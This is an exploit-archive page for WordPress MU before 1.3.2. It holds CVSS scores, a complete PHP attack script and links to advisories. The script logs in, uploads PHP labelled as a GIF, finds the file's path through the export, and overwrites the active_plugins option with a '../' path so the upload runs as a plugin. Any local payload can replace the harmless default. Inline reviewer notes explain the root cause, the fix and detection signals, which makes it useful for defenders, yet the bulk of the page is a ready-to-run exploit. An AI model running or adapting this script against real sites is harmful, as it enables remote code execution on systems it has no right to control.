Wordpress MU < 1.3.2 active_plugins option Code Execution Exploit

2008.12.23
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 8.5/10
Impact Subscore: 10/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<?php
/*
 WordPress [MU] blog's options overwrite
 Credits : Alexander Concha <alex at buayacorp dot com>
 Website : http://www.buayacorp.com/
 Advisory: http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html

 This exploit uses active_plugins option to execute arbitrary PHP

 Reviewer notes (defensive reading of the chain below):
 - Root cause as exercised here: wp-admin/options.php appears to take the list of
   option names to update from the request itself ('page_options'), so an
   authenticated user who can reach that page can overwrite active_plugins with an
   arbitrary relative path; the uploaded file is then loaded as if it were a plugin.
   The advisory header classes this as CWE-20 (improper input validation).
 - Preconditions visible in the code: valid credentials for a user holding the
   'manage_options' and 'upload_files' capabilities, and an upload handler that
   stores the file somewhere under wp-content.
 - Mitigation: the advisory title puts the affected range at WordPress MU < 1.3.2,
   so upgrading is the fix; independently, audit which roles hold manage_options.
 - Detection: a POST to wp-admin/options.php carrying page_options=active_plugins
   with a '../' component in the value, preceded by an upload to
   wp-app.php?action=/attachments whose body is PHP but declared as image/gif, and a
   wp-admin/export.php?download request from the same session.
*/
include_once './class-snoopy.php';

// Fix Snoopy
// Lets submit() send a pre-built raw body: when $formvars is already a string it is
// returned as-is instead of being form-encoded, which the attachment upload relies on.
class SnoopyExt extends Snoopy {
    function _prepare_post_body($formvars, $formfiles) {
        if ( is_string($formvars) ) {
            return $formvars;
        }
        return parent::_prepare_post_body($formvars, $formfiles);
    }
}

set_time_limit( 0 );

// Any user with 'manage_options' and 'upload_files' capabilities
$user = 'user';
$pass = '1234';
$blog_url = 'http://localhost.localdomain/mu/';
$remote_file = ''; // relative path to wp-content
$local_file = '';  // the contents of this file, if any, will be uploaded

$snoopy = new SnoopyExt();
$snoopy->maxredirs = 0; // presumably keeps Snoopy from following the post-login redirect — confirm in class-snoopy.php
// NOTE(review): the login form seems to require this cookie to be present — confirm against wp-login.php
$snoopy->cookies['wordpress_test_cookie'] = 'WP+Cookie+check';
$snoopy->submit("{$blog_url}wp-login.php", array('log' => $user, 'pwd' => $pass));
$snoopy->setcookies(); // Set auth cookies for future requests

if ( empty($remote_file) ) {
    // Upload a new file
    // Step 1: the payload goes through the Atom attachments endpoint labelled as
    // image/gif although the body is PHP (see get_contents()); the <id> of the new
    // attachment is parsed from the response. The type/content mismatch is a
    // useful alerting signal on the upload path.
    $snoopy->_submit_type = 'image/gif';
    $snoopy->submit("{$blog_url}wp-app.php?action=/attachments", get_contents());
    if ( preg_match('#<id>([^<]+)</id>#i', $snoopy->results, $match) ) {
        $remote_file = basename($match[1]);
    }
}
if ( empty($remote_file) ) die('Exploit failed...');

// Look for real path
// Step 2: the export download evidently contains attachment metadata that includes
// the on-disk path of the upload; everything up to and including 'wp-content' is
// stripped so only the path below wp-content remains.
$snoopy->fetch("{$blog_url}wp-admin/export.php?download");
if ( preg_match("#<wp:meta_value>(.*$remote_file)</wp:meta_value>#", $snoopy->results, $match) ) {
    $remote_file = preg_replace('#.*?wp-content#', '', $match[1]);
}
if ( empty($remote_file) ) die('Exploit failed...');

// It assumes that file uploads are stored within wp-content
// The '../' prefix is the traversal component: plugin paths are presumably resolved
// relative to the plugins directory, so this climbs back to wp-content. This is the
// value to look for in option-update requests.
$remote_file = '../' . ltrim($remote_file, '/');

$snoopy->fetch("{$blog_url}wp-admin/plugins.php");

// Recover previous active plugins
// Step 3: currently active plugins are scraped from the deactivate links and
// re-submitted together with the new entry (presumably the update replaces the
// whole option, so omitting them would deactivate existing plugins).
$active_plugins = array();
if ( preg_match_all('#action=deactivate&([^\']+)#', $snoopy->results, $matches) ) {
    foreach ($matches[0] as $plugin) {
        if ( preg_match('#plugin=([^&]+)#', $plugin, $match) )
            $active_plugins[] = urldecode($match[1]);
    }
    print_r($active_plugins);
}
$active_plugins[] = $remote_file;

// Fetch a valid nonce
// Step 4: the 10-character _wpnonce is read from options-general.php. The nonce
// defends against cross-site requests, not against an authenticated user, so it is
// not a barrier here — the missing check is on 'page_options' itself.
$snoopy->fetch("{$blog_url}wp-admin/options-general.php");
if ( preg_match('#name=._wpnonce. value=.([a-z\d]{10}).#', $snoopy->results, $match) ) {
    // Finally update active_plugins
    // Step 5: the request that exercises the flaw — 'page_options' names the option
    // to write and the active_plugins value carries the traversal path.
    $snoopy->set_submit_normal();
    $snoopy->submit("{$blog_url}wp-admin/options.php", array(
        'active_plugins' => $active_plugins,
        '_wpnonce' => $match[1],
        'action' => 'update',
        'page_options' => 'active_plugins',
    ));
}

// Body for the upload in step 1: the local file if it exists, otherwise a benign
// marker that only prints its own path (useful for confirming the vulnerable
// condition without a live payload).
function get_contents() {
    global $local_file;
    return file_exists($local_file) ? file_get_contents($local_file) : '<?php echo "Hello World " . __FILE__; ?>';
}
?>

References:

http://www.milw0rm.com/exploits/5066
http://www.buayacorp.com/files/wordpress/wp-blog-option-overwrite.txt
http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html
http://secunia.com/advisories/28789
http://mu.wordpress.org/forums/topic.php?id=7534&page&replies=1

